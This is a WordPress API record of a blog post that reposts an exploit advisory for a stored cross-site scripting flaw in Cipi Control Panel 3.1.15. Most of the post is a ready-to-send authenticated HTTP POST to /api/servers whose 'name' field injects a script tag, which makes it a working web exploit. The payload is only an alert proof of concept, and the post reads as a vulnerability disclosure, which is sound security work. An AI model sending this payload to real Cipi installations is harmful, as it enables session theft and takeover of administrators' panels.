{"id":21126,"date":"2022-02-28T20:18:24","date_gmt":"2022-02-28T17:18:24","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166161\/cipicp3115-xss.txt"},"modified":"2022-03-02T12:32:32","modified_gmt":"2022-03-02T09:02:32","slug":"cipi-control-panel-3-1-15-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/cipi-control-panel-3-1-15-cross-site-scripting\/","title":{"rendered":"Cipi Control Panel 3.1.15 Cross Site Scripting"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: Cipi Control Panel 3.1.15 &#8211; Stored Cross-Site Scripting (XSS) (Authenticated)<br \/>\n# Date: 24.02.2022<br \/>\n# Exploit Author: Fikrat Ghuliev (Ghuliev)<br \/>\n# Vendor Homepage: https:\/\/cipi.sh\/ &lt;https:\/\/www.aapanel.com\/&gt;<br \/>\n# Software Link: https:\/\/cipi.sh\/ &lt;https:\/\/www.aapanel.com\/&gt;<br \/>\n# Version: 3.1.15<br \/>\n# Tested on: Ubuntu<\/p>\n<p dir=\"ltr\">When the user adds a new server on the &#8220;Server&#8221; panel, the &#8220;name&#8221;<br \/>\nparameter is not subject to any filtering.<\/p>\n<p dir=\"ltr\">POST \/api\/servers HTTP\/1.1<br \/>\nHost: IP<br \/>\nContent-Length: 102<br \/>\nAccept: application\/json<br \/>\nX-Requested-With: XMLHttpRequest<br \/>\nAuthorization: Bearer<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36<br \/>\n(KHTML, like Gecko) Chrome\/98.0.4758.82 Safari\/537.36<br \/>\nContent-Type: application\/json<br \/>\nOrigin: http:\/\/IP<br \/>\nReferer: http:\/\/IP\/servers<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-US,en;q=0.9<br \/>\nConnection: close<\/p>\n<p dir=\"ltr\">{<br \/>\n&#8220;name&#8221;:&#8221;\\&#8221;&gt;&lt;script&gt;alert(1337)&lt;\/script&gt;&#8221;,<br \/>\n&#8220;ip&#8221;:&#8221;10.10.10.10&#8243;,<br \/>\n&#8220;provider&#8221;:&#8221;local&#8221;,<br \/>\n&#8220;location&#8221;:&#8221;xss test&#8221;<br \/>\n}<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit 
Title: Cipi Control Panel 3.1.15 &#8211; Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 24.02.2022 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https:\/\/cipi.sh\/ &lt;https:\/\/www.aapanel.com\/&gt; # Software Link: https:\/\/cipi.sh\/ &lt;https:\/\/www.aapanel.com\/&gt; # Version: 3.1.15 # Tested on: Ubuntu When the user wants to add a new server on the &#8220;Server&#8221; panel, in &#8220;name&#8221; parameter &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21126","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21126","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21126"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21126\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21126"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21126"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}